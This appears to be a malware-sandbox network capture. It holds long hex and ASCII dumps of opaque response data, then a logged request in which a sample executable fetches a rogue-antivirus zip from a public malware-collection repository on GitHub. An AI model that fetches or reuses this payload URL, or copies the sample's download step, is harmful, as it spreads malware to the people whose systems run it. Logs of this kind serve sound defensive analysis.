                                                                                                                                                2022-09-29 12:51:37 UTC15733INData Raw: 91 82 62 22 e6 3f 11 4c 72 2a 3b 28 80 3e 01 ef 15 c2 53 55 66 b1 6d 58 fd ea 00 a8 97 0d a1 52 bf 46 ea f4 58 c2 af a4 ef 50 1d c1 10 cb ae 5f 8c f1 4b cf 1a 4f ac e3 a1 79 f0 3c cb 9b 81 22 ed eb 13 90 85 45 de df 67 9d f0 2e 3c 90 40 4a 7c 94 0a ad 0f 3e cb bf 35 35 a6 c7 32 f9 31 ce b4 3d ca da 6a 1c 8c fe a5 5a 19 46 38 50 5a 70 dd f5 56 97 7b b5 b1 9f fe 8f 33 83 50 f6 ef 31 a6 23 71 f6 63 62 4c 06 41 e3 b3 ba 73 38 7f 8c 8d 74 3b 26 3a 5e 6d be 56 af 41 fd e4 f3 ea 3e 37 8a 49 ac 4d 9c 31 9d 82 ed ce 7c e4 56 f0 86 23 94 b6 fd 2f a5 62 99 2f ac 9b df 4a f2 46 57 0b 39 fb a2 50 dd 50 3d 01 75 4b df 5b 0d b5 8f ca 1b 72 cd ef 09 b5 b8 27 5c cd 5e d9 ab 76 8b 1d 4b 0b 89 31 37 c8 12 78 48 2b 55 21 ce a4 85 af 8a 5e 98 dd 0a 4b 63 f4 7f a7 0d e0 73 e4
                                                                                                                                                Data Ascii: b"?Lr*;(>SUfmXRFXP_KOy<"Eg.<@J|>5521=jZF8PZpV{3P1#qcbLAs8t;&:^mVA>7IM1|V#/b/JFW9PP=uK[r'\^vK17xH+U!^Kcs
                                                                                                                                                2022-09-29 12:51:37 UTC15749INData Raw: 74 10 b4 3c 55 6d f0 83 0d 05 6f a4 95 38 9b 47 7c 30 33 1d a0 ad 75 2c d6 3e ac 86 fd 98 42 92 50 9f 05 6a 1e 00 d5 6e ff 84 d7 1f e2 d6 04 70 80 a6 65 3a 5e a6 be 4c 19 28 c3 d0 7b 76 30 a1 cf e0 50 d8 84 9b aa ec 86 fb 34 da ab c4 54 ed eb 5f b2 45 10 da 72 b9 d6 a8 19 12 16 25 18 7d 4a 25 40 72 fe f0 3c 90 01 c2 87 aa 99 cf b1 3b 68 3d 30 46 ab af 37 cc 6d 41 ba 41 1b 86 9b 85 a8 32 b1 58 a6 77 93 a4 22 62 00 ee a0 2a 74 f9 52 71 31 20 66 10 04 5a 0e 19 c0 4a 98 aa 00 8f 63 14 18 6e 68 d4 75 00 94 9d 9b 4e 8d 80 4d f3 25 5b b0 0b 29 d2 00 48 49 dd 08 8b 9e a3 d9 58 c5 d7 80 39 f8 62 52 9d d3 85 23 09 78 d9 fa ef ac aa ff e2 b4 3b 1c f6 54 f3 f5 08 e9 80 90 30 93 ed c2 38 a1 ef a1 77 53 4d 45 07 82 ca d6 82 f4 f1 29 23 58 60 fd 9d fe eb 65 01 db 71 35
                                                                                                                                                Data Ascii: t<Umo8G|03u,>BPjnpe:^L({v0P4T_Er%}J%@r<;h=0F7mAA2Xw"b*tRq1 fZJcnhuNM%[)HIX9bR#x;T08wSME)#X`eq5
                                                                                                                                                2022-09-29 12:51:37 UTC15765INData Raw: ba 7d cc 34 2d 1a a2 98 76 e2 4b 02 a3 d5 c6 a3 d9 86 ab 7f d6 0e e3 05 0d c2 4c a2 d3 f2 41 5c d5 f6 0f 54 0f 9d 6d ac 34 1f a1 b7 2e 12 b5 01 e3 98 36 50 b0 ef 73 92 8b 19 ab 68 85 a1 1c 30 83 b6 03 da 0b 7e 67 f0 42 81 33 90 7f 58 53 53 69 8a 9d a4 59 11 9b dd 6c d6 1d d3 5a 0f f2 da fd 90 7d 40 82 41 91 c8 3e 28 b5 ed 3b ad 8e dc 83 20 18 b1 b8 18 d3 31 f2 32 70 92 0c 76 88 da 6d 45 b4 4d 77 25 29 13 f4 cf 92 78 25 3b d5 c7 c4 9f 6f 75 5e 10 e1 f5 30 e3 d8 22 05 8a 12 cf 3c 24 7f df 32 ae d4 7e a5 c7 2d 18 75 c5 1d 29 71 a0 ae 63 37 e7 21 d5 17 a8 30 68 8e 1c 98 f7 fe 10 03 c0 36 42 c6 a3 e0 e4 61 61 bf 3a 82 d1 4c f6 67 82 1a 2c 38 27 2b f7 85 33 cd 92 fa a5 ed 4c cf ad da 2d 09 c0 54 40 b3 0c e6 87 2b 92 5b d1 47 f8 27 03 3e c7 57 60 77 0c 41 ba 09
                                                                                                                                                Data Ascii: }4-vKLA\Tm4.6Psh0~gB3XSSiYlZ}@A>(; 12pvmEMw%)x%;ou^0"<$2~-u)qc7!0h6Baa:Lg,8'+3L-T@+[G'>W`wA
                                                                                                                                                2022-09-29 12:51:37 UTC15781INData Raw: 14 16 18 6c 6e eb 6b 02 f1 49 e5 c0 08 6d 62 75 83 19 7c 27 b3 bb a3 54 1b cb d0 31 e2 08 9f 85 50 57 e3 d2 8e 57 93 59 19 0b 30 25 a2 03 37 f9 94 5d a3 6e 0b 0a 42 df 6d 76 2a 4c 71 9d 8d 99 b8 07 d1 a9 f9 06 9a 3a 42 3e 2d 7e 77 ea fa e9 27 c8 b1 ef 7c 1f e0 fb c7 7b 39 c9 f6 99 8e fe c3 8b 14 58 08 45 a7 a2 66 3a 08 a9 b8 71 64 d1 1a 23 0b fb 71 ec 8e aa 30 40 68 b6 27 76 a7 c3 55 b3 4c c7 7e 1b 12 6b 65 5e b5 d5 c7 bb 2b 02 17 ce d5 38 01 70 93 f1 42 4d 01 24 8b 90 2f 5e cb d7 50 12 19 ee 99 a4 47 16 f5 f6 b7 4f 26 50 86 d2 63 10 64 3c 73 3c d5 c9 ec 29 b1 69 32 db 92 b5 9b 48 d0 84 4e 19 96 35 15 36 f2 ae d1 32 56 b3 05 d3 85 a1 f3 0e 3e a3 e8 10 e8 94 ca 3a fe dd e4 85 19 ff 1a 3d d8 61 85 fb f5 c4 a7 93 b4 3b 13 7f 42 ae 3b fe 96 72 23 0c e9 cc 79
                                                                                                                                                Data Ascii: lnkImbu|'T1PWWY0%7]nBmv*Lq:B>-~w'|{9XEf:qd#q0@h'vUL~ke^+8pBM$/^PGO&Pcd<s<)i2HN562V>:=a;B;r#y
                                                                                                                                                2022-09-29 12:51:37 UTC15797INData Raw: 7e f3 65 3f 7f c0 8e cf 73 fd c2 78 3e e3 63 dc 9a c6 d3 91 f1 93 ca 61 a1 05 dd 2e a8 aa 37 67 4b 8a f9 46 1b e2 8e 38 7a e8 3b 5c b8 00 62 90 8b c6 74 98 8d e7 23 4a 4a 51 1e d7 47 e2 aa 28 71 0a 64 c3 18 74 7c 69 bc 08 e9 c5 45 12 ff c7 1d ab 8e 7a b7 f3 7d c8 3e 68 59 b5 29 7b fd 88 57 c9 54 9b 11 59 56 7c 23 9b ea 95 fd 60 97 62 35 a3 61 8d ce f3 0c 3e 68 ff c5 cc 61 db b3 b3 39 53 7b 51 00 00 c7 ac 61 5f 1c e7 07 ea 00 60 e8 66 de 97 8a df 94 97 71 1d 2b 21 63 3c a1 e2 69 f0 51 be b3 2e 4d f6 da eb 0a fa 87 eb 4f 01 0a 93 1a d3 e9 21 a8 ff ef 86 fe 59 b7 89 de 0f 1d 6e d1 29 41 3f 87 d8 6b 97 bd 37 54 e8 a1 c0 24 64 e3 a7 80 04 09 f1 d9 a2 85 6c 71 79 68 18 3c 3a aa 14 61 12 8d c5 c0 d5 aa 35 35 d4 ea e7 8b 3f 45 b6 ab 16 f6 de 9f 86 48 b1 6f a9 36
                                                                                                                                                Data Ascii: ~e?sx>ca.7gKF8z;\bt#JJQG(qdt|iEz}>hY){WTYV|#`b5a>ha9S{Qa_`fq+!c<iQ.MO!Yn)A?k7T$dlqyh<:a55?EHo6
                                                                                                                                                2022-09-29 12:51:37 UTC15813INData Raw: 08 8e 18 ce 28 92 eb c0 47 15 fb 7a bc 0d 6d dc a9 59 c0 c5 ab 78 c0 a3 7c ea a9 77 2d 34 8c a4 a7 ee 7b d9 64 49 a3 17 9f fa 74 22 a0 f8 95 00 6e 88 e9 cf a2 ee 82 3d 85 a6 da e8 d0 71 fa 25 0e 40 c3 69 45 2e 19 4c 10 e4 f7 f7 2b 63 f5 5b ce 85 e7 12 d3 cb c7 7d 28 af 1b 10 94 59 c4 64 ea be 21 76 28 53 e9 98 4a fe 06 0d 04 5c 76 8e 2c bd 1e e4 4f 66 ca 4f 8e 8e ba 00 cf d6 2c f0 22 11 c3 4a 2a 8d 9b 78 89 00 f1 06 f9 82 87 93 cd 53 a0 18 82 aa 86 9f a3 cf e9 d5 75 25 cb 5f 21 db 6d 43 a3 65 db db dc ed 8b 17 3c b4 6d 1d 68 bc aa 61 52 37 c3 e4 44 6b 23 5e 28 9b 31 4e 61 d5 66 37 92 46 7b a2 40 2f 1c 60 cc 63 49 68 13 9f 28 84 49 0a c8 0a b6 7a 8c 6d 9b 83 a7 79 29 1a b9 62 28 30 45 bb a8 f8 c6 dc bb e2 54 68 32 ec 50 0b 80 7f c9 96 30 76 fe 2b fb 72 8d
                                                                                                                                                Data Ascii: (GzmYx|w-4{dIt"n=q%@iE.L+c[}(Yd!v(SJ\v,OfO,"J*xSu%_!mCe<mhaR7Dk#^(1Naf7F{@/`cIh(Izmy)b(0ETh2P0v+r
                                                                                                                                                2022-09-29 12:51:37 UTC15829INData Raw: 1d ec 62 f7 c1 2b a6 77 de 13 15 1d f3 24 e5 a0 10 df 99 0c 66 3c 04 2c 38 30 46 df 90 eb a2 bb ed cb 1f 76 3d 62 ee ef c7 bc 71 37 dc 8d 40 8e e7 a2 d0 06 54 a4 6f bc 2b d8 25 35 49 3c 0c 14 aa 73 19 f0 7c 10 47 f1 3e 68 55 30 73 fc 00 9f 85 4d cd 36 6e 12 39 ed cf 4d ab d1 b9 93 a7 95 d4 24 4e dc ae 49 da 86 ea 74 9a f4 b8 c1 02 f8 4a 45 69 92 2e 28 3f d8 b6 d2 9b 12 81 87 0a 71 46 f1 f9 1c 1d b3 e1 c6 f3 7f f8 6a 91 e4 e5 11 9c eb 9a 1d 5b 63 64 b6 f8 bb 4e 19 b9 20 42 1a b1 96 54 a9 b6 29 8c ef 06 45 4a df ed 04 1b 68 53 3b 42 c3 c1 aa c1 e6 3d 53 7a 72 15 cc 33 24 46 8b bd fd d5 3a 73 ac b7 2d 91 a7 ab 46 04 2e 0e b0 1d 07 60 6f 07 94 19 ce 62 11 36 6b 92 67 c8 33 46 f4 49 cd f9 1a 83 6d fc e9 ec 39 34 8b c8 c3 a2 bc 52 73 01 12 95 d6 0a e4 98 cd e9
                                                                                                                                                Data Ascii: b+w$f<,80Fv=bq7@To+%5I<s|G>hU0sM6n9M$NItJEi.(?qFj[cdN BT)EJhS;B=Szr3$F:s-F.`ob6kg3FIm94Rs
                                                                                                                                                2022-09-29 12:51:37 UTC15845INData Raw: 6a 54 c9 c9 f5 ef ef 00 a3 c8 2b dc 65 95 61 3f d9 71 f0 72 c0 c7 a8 c6 f8 2a 6a 95 d8 1c 7f 7e 3e 8c 5a 74 81 7d 5b d5 ce b2 c0 d2 af 4d 2d 9e 66 88 d4 1f d4 fa f2 b3 0e 66 d2 3a 33 01 df 17 f0 74 4e 42 08 ea 4d b3 5b 5a 5b ec 13 33 73 4a 5e 1e f0 c7 0c e6 14 3c 3d 3c c7 6d d6 78 f1 a5 ab 62 11 0d 5f fc 0c 14 2e df 28 68 2b 5c d9 d2 17 41 75 2f 1b 99 cb 56 e1 d2 73 bf d2 14 6f 95 55 fc 60 61 75 6c ab 75 5f ce 5b 42 b2 00 20 75 0d b2 50 53 4c 8b fd a8 24 5f 8f 07 e4 92 7d e4 f7 de 2d 37 66 0a ac 40 bf 15 ba 2b 85 d1 57 2d 90 9a 7f 55 ac b6 2e 8a b2 55 b0 55 61 bc 87 cb 9c c6 fc 7a 1f 1b f5 91 e3 2a c7 16 fc 02 03 b0 9c b4 15 06 97 2b 37 4f 17 19 06 64 42 25 0c 4f 0d a7 55 22 b3 14 94 c1 9d 0c 80 a4 f4 fa 5e 16 92 c9 96 94 d6 ad 8c da 6b 7e ae 9d 58 df c2
                                                                                                                                                Data Ascii: jT+ea?qr*j~>Zt}[M-ff:3tNBM[Z[3sJ^<=<mxb_.(h+\Au/VsoU`aulu_[B uPSL$_}-7f@+W-U.UUaz*+7OdB%OU"^k~X
                                                                                                                                                2022-09-29 12:51:37 UTC15861INData Raw: d1 69 fb 22 5d 4d 13 43 74 5d dc 21 16 94 35 48 fc f4 ec a3 3f b5 98 a6 01 2f 97 a2 b1 62 62 7d 94 57 d2 fd 2e cc 5b ec 61 82 e6 61 7b c6 5d 8a ef d3 ad f7 2a 03 16 be b9 24 30 7a 1a 80 15 ba d5 27 43 08 79 21 fb ae 84 10 c1 77 ff 34 10 43 3d cf 0c 8a a1 b3 4b df 58 46 c5 3b 9a e1 ad 07 dc 70 d3 72 35 c7 f5 46 f3 29 ef 6b 32 58 8b 06 16 6b 4a fe 31 f2 6d 46 80 86 de c9 c6 4f ea 3b b7 4f 19 0c 14 55 46 d6 12 50 a0 81 ad 2d c6 0d e0 cd 61 b7 74 5c 5b 89 a9 72 bf 0b 72 90 7e d6 9f 60 76 ee 20 56 c8 b0 99 d0 7d a6 e7 f8 a4 a4 40 cb 98 3a b7 77 87 08 30 e8 e3 03 6c a0 78 af 0d d9 eb 5e f9 91 49 a8 ae 9f 00 33 c1 5c d8 28 05 87 2a 18 7c 35 18 c3 9c d4 a0 2f 48 6f 76 83 f0 d1 9e cc 5f 4b d3 3d 64 28 fc a8 d3 df 68 52 3b 45 ff dc 1c 7d 32 ee 2a 43 a9 8f cb e3 7d
                                                                                                                                                Data Ascii: i"]MCt]!5H?/bb}W.[aa{]*$0z'Cy!w4C=KXF;pr5F)k2XkJ1mFO;OUFP-at\[rr~`v V}@:w0lx^I3\(*|5/Hov_K=d(hR;E}2*C}
                                                                                                                                                2022-09-29 12:51:37 UTC15877INData Raw: 46 36 e9 ee 92 08 16 81 49 c4 81 36 c5 ae 7d a9 b7 49 c7 de 61 b6 19 d2 1f 97 59 84 40 88 f0 b1 00 7f 49 a8 31 58 92 4f 17 e6 cd de fe a7 8e 91 c9 76 fe 84 79 ce 59 61 ea 41 79 65 c3 7b c4 c0 84 b7 4f 0b 39 08 5a 68 65 93 aa f0 96 8f a5 73 e4 91 25 d3 fb bc 99 39 c0 5f e4 e4 4b 2c d1 88 ee fe 51 66 87 5c 7e 4e b3 9d 7e d8 81 8f 01 24 a8 da bf 66 be af 3c d4 63 a4 39 79 2f 3f 7c 90 81 6e 45 19 11 3a 8b f5 90 f9 79 41 0a 5d bf 03 69 97 64 aa ea 06 fa 87 77 d3 67 94 81 ad fc 8b 1f c9 02 41 ba 0b 70 c1 ce 92 9b 64 9b 08 e5 54 81 e4 7b 08 1c cc e3 43 b7 1f 14 2f 13 18 f4 5d 63 91 61 fe 70 94 27 02 05 30 be 70 c6 f0 0b 01 09 30 82 4f 63 e5 ff f4 e9 f2 74 be e9 97 96 23 ef 2f bf 93 14 db 02 ce f7 32 50 09 4b 42 5e e1 45 6f bc fd a7 e9 92 e5 cd 80 ab 09 db 6b 48
                                                                                                                                                Data Ascii: F6I6}IaY@I1XOvyYaAye{O9Zhes%9_K,Qf\~N~$f<c9y/?|nE:yA]idwgApdT{C/]cap'0p0Oct#/2PKB^EokH
                                                                                                                                                2022-09-29 12:51:37 UTC15893INData Raw: 73 a7 e2 56 cc 91 ea 2d e3 62 a4 f7 28 83 65 46 81 10 2f e3 88 81 37 b5 44 18 7f 38 5e 18 07 42 47 b4 20 ef 03 f9 ab 89 a8 da 40 5e 1d 73 20 ae cb 48 80 6a 68 86 e5 a7 12 89 87 50 6f 8e 70 af 9d 56 6c 5c 73 54 d1 aa 74 bd 14 2a 28 6e b5 2a 62 65 c1 b3 38 f9 83 75 9c 4c 5e 82 5d 0f fa 22 90 bd 6b 64 3d 1b b5 71 af 6d f1 a3 83 47 9b ed a2 97 68 61 9d d2 28 c7 85 29 d4 92 71 8c 05 2d 47 90 48 68 a2 36 ef b9 96 32 ea ff c9 5e e3 0a fd e2 0a 65 a2 e7 00 36 d2 78 b4 4f 22 c6 6e 78 27 47 aa 3b 9b 3e 26 60 63 f0 0f 8c 4f de e7 d5 ae 06 ab d3 fd 21 d5 4e 75 01 2b 80 23 a9 f8 6e 03 23 0c d6 a9 41 78 d1 c4 e1 48 72 d3 9e 7f 24 d2 f4 c4 0d 4f 49 97 ca d9 e6 02 d4 52 95 d0 3a ce 49 89 8b 01 c7 b9 52 a9 61 69 94 91 ca 0b 22 3d 2c ba 1c ca b6 af 3a 88 6e 58 b8 d3 81 27
                                                                                                                                                Data Ascii: sV-b(eF/7D8^BG @^s HjhPopVl\sTt*(n*be8uL^]"kd=qmGha()q-GHh62^e6xO"nx'G;>&`cO!Nu+#n#AxHr$OIR:IRai"=,:nX'
                                                                                                                                                2022-09-29 12:51:37 UTC15909INData Raw: 23 0e 4d 1f c4 71 e7 1b ca fa f9 fe e5 2a ed fa 5d fc 21 33 91 cc 54 83 96 41 92 c2 57 ca 22 80 e1 59 04 d5 e6 61 eb d7 d7 60 3b 7b 62 0a 59 71 9e a8 c4 ef 57 ed 93 34 08 1a 4d 74 ea fe 81 f9 d1 d6 8f e6 7f b4 b5 e8 ba 51 a0 b3 69 09 89 d0 20 ba 12 41 de 7e ad 70 9e ad d9 41 ac e8 e2 7a 86 9e f6 85 a3 0c 49 86 22 52 5d fa 71 64 41 cc 8f b4 b8 ec 9e b3 c0 a6 54 a4 79 41 4f db 85 77 a1 bc 16 1c 08 a7 83 03 80 27 67 5e 97 76 37 fe c1 21 8a 64 c2 da d3 bc 01 e0 35 1e 84 7c a8 82 3f cc 0b f2 d6 89 75 25 4b 95 a4 34 cb a1 08 22 32 28 99 b5 de d7 1d 45 18 63 c0 8c 5c 08 39 7e 01 28 bc 84 3a cb d4 03 0c f7 cd 95 ac d4 e2 9f 5d fd 32 64 64 8b 08 84 6d 11 1c ef 7b 91 57 0e 7a bf 06 0e 9c ad e6 8d 1f 73 24 ed 62 bf 6d 23 a8 bf a4 d7 cb 9a 56 6d ce e7 94 62 d3 1e 18
                                                                                                                                                Data Ascii: #Mq*]!3TAW"Ya`;{bYqW4MtQi A~pAzI"R]qdATyAOw'g^v7!d5|?u%K4"2(Ec\9~(:]2ddm{Wzs$bm#Vmb
                                                                                                                                                2022-09-29 12:51:37 UTC15925INData Raw: 15 3c 3c 89 d0 e9 ec da c8 02 38 12 7b ce d7 bd 5c bd fe 2b d6 0b 0a 17 2f d1 24 47 0d ae 12 ca 7d 6e 28 9f fb c3 22 53 28 9c b4 5e 33 37 21 1a 38 a1 15 62 6b 67 96 7e 40 85 16 fe 87 79 42 e5 4b e7 f3 ef 15 38 d7 80 65 28 bc c3 5e af 67 63 b1 d5 45 96 44 f3 c1 7f ab 0d d1 4c 47 41 82 d4 3b 60 49 5b f9 ad 2a a2 2d 3e ce be 77 de 1c 60 e7 02 5e e0 74 72 63 39 02 c1 22 8a 12 0f a7 b6 af b2 7a b7 bb c6 c6 1c 87 ec 90 9a 20 60 5f 1d 1f 18 95 cb 43 08 b0 40 31 31 fd 15 ec 3b bb bf 0f 4a d5 f4 c3 02 bb 91 ed b1 7a 06 3a f9 b6 21 79 d2 2c 82 46 22 7a b4 ca 74 60 b9 f8 69 7f 1d b2 3d 41 d1 fa 15 76 c2 d7 0c 24 6b 97 a7 50 9c 1a a3 25 1c 75 cb 96 cd 61 16 5f 42 37 a0 d6 40 10 20 f8 e1 87 a2 68 fa df e9 22 4e 98 15 9b 6d 58 20 fd 07 bf b4 6a dc 9e 7b 3a 07 4f 7c f5
                                                                                                                                                Data Ascii: <<8{\+/$G}n("S(^37!8bkg~@yBK8e(^gcEDLGA;`I[*->w`^trc9"z `_C@11;Jz:!y,F"zt`i=Av$kP%ua_B7@ h"NmX j{:O|
                                                                                                                                                2022-09-29 12:51:37 UTC15941INData Raw: a8 d5 0c d1 41 05 74 f4 2f a2 2e da 77 c0 5d 20 ed 66 cc ea 0e 91 12 59 e4 f8 71 2c 6d 5a 34 d8 ed 14 17 fc 66 bb 37 0d bc 17 51 28 67 b6 d5 56 3e 82 b6 84 fd b8 63 90 81 db e0 5d 16 eb 85 29 c3 ca d8 b4 87 76 69 bb 34 50 41 51 fd 93 fa 9b d5 53 84 6c ac 5b 31 32 2d 54 19 b9 73 ab 0d 61 cb 26 7f 20 d3 37 fb c2 7f 1c 90 05 db 22 e3 f7 44 83 bf c2 fa 8f 10 b5 45 f4 97 43 56 5b e3 17 8c 3e b7 49 aa 37 74 56 1d d5 91 44 c9 ad 52 46 f9 c3 64 f7 06 af e1 8b b2 fd 41 30 53 ac cb 42 33 3a a5 50 b7 19 6e b6 0e b9 9d cc 29 10 46 ea ee b6 55 e5 b8 46 c4 7e bd ad 12 60 be c3 d0 cc a6 bb 88 1a 6a 7e 9c d9 97 77 9c fa f6 db e3 4c 5b 41 0c 41 35 93 31 45 17 a8 f6 49 ef 0a 05 21 68 3b ec e7 31 d9 f1 a1 92 68 19 65 cd 6a c6 8b c2 9a f3 cb f6 5c 05 bd 4b 1a 2a f5 7d ba 96
                                                                                                                                                Data Ascii: At/.w] fYq,mZ4f7Q(gV>c])vi4PAQSl[12-Tsa& 7"DECV[>I7tVDRFdA0SB3:Pn)FUF~`j~wL[AA51EI!h;1hej\K*}
                                                                                                                                                2022-09-29 12:51:37 UTC15957INData Raw: 45 4c c7 a0 41 cc 8c 8e 28 8f eb 51 a1 ad 0b 1c 73 33 26 f7 79 34 f9 f7 bb b2 fc 93 e7 24 25 f7 f2 1b 9b 7e 0e 6a b4 dd 26 67 c6 b0 cf ea e4 cd 8c 47 5a e2 27 40 3d 4f 28 c3 b8 9a 8f 1a 51 aa 78 8b f4 e1 a1 d0 87 38 dd df dc 6a 4d 1d 0b dd 37 ea ca 2f 1c 3c 8d 41 e0 56 b5 ae ee 62 ad 76 f8 31 a7 f6 5a ee 3b 98 74 36 57 60 46 b1 fa d6 88 fc 33 0d 38 c7 79 82 ca 55 3f f8 0a 33 95 4c c2 43 2d e6 db b7 ac 8d 4f 6d a6 da fd 9e ab 07 5c e8 5e 42 fb 12 b5 ed 52 c2 fe 5a 83 c5 1b 92 a6 a1 6a 64 df fa 7f 0e 97 c6 d2 48 1d d0 49 23 4a 00 a9 74 22 3f ae 5d 30 bb 74 34 7e ce b6 7f 1c 00 90 e0 b5 7a d3 50 43 fb 78 6d 56 44 82 df ed 8d e0 7e 90 eb 0e b9 6b 5f 3c 81 18 d7 46 80 10 4e a6 cc 0d 05 13 6a 63 2f 36 c6 34 ff 91 b7 7a d8 7a da 0b e6 ab 49 3d 3e 30 98 ff 3b e8
                                                                                                                                                Data Ascii: ELA(Qs3&y4$%~j&gGZ'@=O(Qx8jM7/<AVbv1Z;t6W`F38yU?3LC-Om\^BRZjdHI#Jt"?]0t4~zPCxmVD~k_<FNjc/64zzI=>0;
                                                                                                                                                2022-09-29 12:51:37 UTC15973INData Raw: d0 2d 40 06 9a 15 ae 35 a4 05 46 28 5d 24 bd 07 76 64 8f 77 e0 7d d6 fc e6 d7 e1 fc cf 62 9e 36 19 06 0a 9c 47 e1 f4 53 6d ec 0b 09 d6 69 03 25 8a 51 d3 37 a6 de 0d 6c 2c 37 8d 36 33 16 24 02 55 61 25 53 7f f8 c4 a9 72 64 7d 2f 78 39 f0 eb bb aa f8 25 2a ff 34 0e 8f 94 0d 10 1d 77 7f 3b 07 a7 15 8d 45 b0 3c 6d ea ef 25 1c 59 55 a1 ec cd 35 36 05 7a 26 ce 4a 4c ae ed d2 dd 0a 3b 19 63 a5 2b 9d 99 bf bd 3e 59 57 da 99 9f 7d e3 13 86 23 78 0d 38 37 4a bb 89 22 95 a6 43 d9 d8 be 3f 71 5b 73 96 65 5e 28 6d 31 6c 02 3d e0 51 dd bb a8 00 ab 58 07 c9 f4 f8 4a c2 a5 3a 39 c8 f8 d7 af e1 6c d3 83 43 d2 52 55 5e 99 bb 8c b6 f6 8f 0c 64 64 48 b1 d6 f1 be a5 a3 d6 08 44 85 eb 67 21 ec 36 d9 49 72 e3 ac 92 46 b5 7d 1c 56 3b f7 48 46 f4 3f 9e e8 a6 e2 4a c8 cb 3e 6a a3
                                                                                                                                                Data Ascii: -@5F(]$vdw}b6GSmi%Q7l,763$Ua%Srd}/x9%*4w;E<m%YU56z&JL;c+>YW}#x87J"C?q[se^(m1l=QXJ:9lCRU^ddHDg!6IrF}V;HF?J>j
                                                                                                                                                2022-09-29 12:51:37 UTC15989INData Raw: e8 6b 79 aa 2d c7 28 40 16 47 4a 1e d1 74 91 32 03 23 60 30 5e 49 2e d8 f3 a6 3b ac d7 e6 e2 46 9e 19 81 ac 7d b5 4a 14 eb ef 7e 94 33 02 21 a1 1f 11 74 92 af 90 23 2e 27 03 c8 97 3d 32 c8 de a8 06 6e 50 2b d8 d6 c8 30 74 9c b5 09 8b 5c 9d e1 66 b6 e1 f3 19 04 24 42 76 df 1a b0 87 b0 fd 54 6e a8 84 ca 30 40 6a 2d a1 e1 77 c3 c2 ca a6 de 00 55 44 39 1c 3b ce 3c 37 2b f2 6d 53 50 8c bd fe 5b 87 b2 cb df 7d 4c 00 ff 12 cb 25 76 c9 1f c1 24 ec 4d b7 f7 f5 32 a5 5f e4 1e 13 17 36 a8 f3 aa 04 8e 79 2a aa 0d c9 33 29 9c ce 84 22 9d bc 62 68 52 1d b2 a1 3e 8d 16 23 26 5d 6c c6 70 26 fb 06 c2 bd a8 64 37 93 f9 8b 93 82 43 7d a4 2e 81 b4 ef ad 45 31 80 ef 56 3c 1f 02 e8 75 f6 16 3f f4 f2 f7 4b 96 eb e9 bb 41 78 53 33 95 c6 bb 7a 56 63 38 db e1 81 d3 08 32 10 ca 0b
                                                                                                                                                Data Ascii: ky-(@GJt2#`0^I.;F}J~3!t#.'=2nP+0t\f$BvTn0@j-wUD9;<7+mSP[}L%v$M2_6y*3)"bhR>#&]lp&d7C}.E1V<u?KAxS3zVc82
                                                                                                                                                2022-09-29 12:51:37 UTC16005INData Raw: 12 42 90 0a 17 ce d1 c2 02 8d 4c 82 aa 89 30 23 4c 4c df be a7 3f 91 42 0c 5d 6d 81 a8 5e 28 bd a6 91 ed 89 f9 e4 33 27 3d df f5 32 96 6a 48 bb 0c da 5f ef a7 0a bb d5 68 e2 f7 88 c2 67 80 e6 23 3f 30 55 d5 b6 71 d4 05 58 31 6e ae 5c 79 68 9b 2b 67 8d 57 29 0d 9a e5 4c 19 0e e3 48 69 9c 54 e3 35 05 dd 9e 57 a7 49 52 13 27 15 10 0c 00 f8 c1 b2 7e ec b7 2a 32 7f 2a b5 15 3c ef 54 c8 59 c8 45 3a ed c9 3e 0e 20 17 09 51 db f4 ba 36 bf 7e 7c a1 49 68 17 db 32 05 44 47 bb fd 4d 85 2f ef 54 ad 50 fe aa ef 31 5d 7f 7a c3 e6 c4 d6 42 c5 62 12 09 44 1b 57 00 f7 1f 8a f5 80 e8 e9 41 05 36 dd f4 fa d7 8a 27 6b 7e dd bb ac 36 0a 77 38 b3 80 7e f5 69 fc 18 4f 7f 97 0b c1 27 00 38 b4 fa 45 4a d0 61 5e b5 93 36 8c 2b 0f 73 3f 64 a4 32 d1 6d dc ab e8 6f a6 36 63 25 41 d3
                                                                                                                                                Data Ascii: BL0#LL?B]m^(3'=2jH_hg#?0UqX1n\yh+gW)LHiT5WIR'~*2*<TYE:> Q6~|Ih2DGM/TP1]zBbDWA6'k~6w8~iO'8EJa^6+s?d2mo6c%A
                                                                                                                                                2022-09-29 12:51:37 UTC16021INData Raw: 00 00 00 f2 60 27 00 00 00
                                                                                                                                                Data Ascii: `'


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                42192.168.2.549742140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:42 UTC16021OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Live%20Protection%20Suite%202019.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:42 UTC16021INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:42 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Live%20Protection%20Suite%202019.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
